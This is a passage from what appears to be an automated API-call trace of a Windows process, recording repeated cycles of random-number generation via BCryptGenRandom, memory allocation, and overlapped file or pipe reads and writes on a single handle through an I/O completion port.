lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.855] CloseHandle (hObject=0x2a8) returned 1 [0203.855] free (_Block=0x3df0008) [0203.855] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.862] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.862] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.862] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.862] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.863] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.863] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.863] free (_Block=0x3e305b8) [0203.863] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.863] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.863] free (_Block=0x1fa91d0) [0203.863] free (_Block=0x1fa2ed8) [0203.863] free (_Block=0x1fa90b8) [0203.863] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.863] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.864] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.864] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.872] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.872] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.872] CloseHandle (hObject=0x2a8) returned 1 [0203.872] free (_Block=0x3df0008) [0203.872] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.879] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.879] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.879] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.880] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.880] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.880] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.880] free (_Block=0x3e305b8) [0203.880] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.880] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.880] free (_Block=0x1fa91d0) [0203.880] free (_Block=0x1fa2ed8) [0203.880] free (_Block=0x1fa90b8) [0203.880] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.881] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.881] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.881] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.889] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xda, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.889] CloseHandle (hObject=0x2a8) returned 1 [0203.889] free (_Block=0x3df0008) [0203.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.895] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.896] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.896] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.896] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.896] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.896] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.896] free (_Block=0x3e305b8) [0203.896] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.896] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.897] free (_Block=0x1fa91d0) [0203.897] free (_Block=0x1fa2ed8) [0203.897] free (_Block=0x1fa90b8) [0203.897] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.897] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.897] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.897] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.906] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xaa, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.906] CloseHandle (hObject=0x2a8) returned 1 [0203.906] free (_Block=0x3df0008) [0203.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.914] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.914] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.914] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.914] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.915] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.915] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.915] free (_Block=0x3e305b8) [0203.915] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.915] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.915] free (_Block=0x1fa91d0) [0203.915] free (_Block=0x1fa2ed8) [0203.915] free (_Block=0x1fa90b8) [0203.915] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.916] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.916] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.916] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.925] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x77, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.925] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.925] CloseHandle (hObject=0x2a8) returned 1 [0203.925] free (_Block=0x3df0008) [0203.925] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.932] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.932] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.932] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.933] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.933] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.933] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.933] free (_Block=0x3e305b8) [0203.933] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.933] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.933] free (_Block=0x1fa91d0) [0203.933] free (_Block=0x1fa2ed8) [0203.933] free (_Block=0x1fa90b8) [0203.933] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.933] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.934] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.934] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.941] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.941] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.941] CloseHandle (hObject=0x2a8) returned 1 [0203.941] free (_Block=0x3df0008) [0203.941] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.947] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.948] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.948] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.948] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.948] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.948] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.948] free (_Block=0x3e305b8) [0203.948] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.948] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.949] free (_Block=0x1fa91d0) [0203.949] free (_Block=0x1fa2ed8) [0203.949] free (_Block=0x1fa90b8) [0203.949] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.949] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.949] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.949] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.957] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xaf, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.957] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.958] CloseHandle (hObject=0x2a8) returned 1 [0203.958] free (_Block=0x3df0008) [0203.958] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.964] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.965] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.965] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.965] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.965] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.965] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.965] free (_Block=0x3e305b8) [0203.965] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.965] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.966] free (_Block=0x1fa91d0) [0203.966] free (_Block=0x1fa2ed8) [0203.966] free (_Block=0x1fa90b8) [0203.966] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.966] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.966] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.966] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.974] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x14b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.974] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.975] CloseHandle (hObject=0x2a8) returned 1 [0203.975] free (_Block=0x3df0008) [0203.975] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.981] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.982] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.982] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.982] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.982] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.982] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.982] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.982] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.982] free (_Block=0x3e305b8) [0203.982] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.982] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.982] free (_Block=0x1fa91d0) [0203.983] free (_Block=0x1fa2ed8) [0203.983] free (_Block=0x1fa90b8) [0203.983] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.983] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.983] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.983] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.991] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x101, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.991] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.991] CloseHandle (hObject=0x2a8) returned 1 [0203.991] free (_Block=0x3df0008) [0203.991] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.998] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.998] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.998] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.999] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.999] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.999] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.999] free (_Block=0x3e305b8) [0203.999] calloc (_Count=0x41, 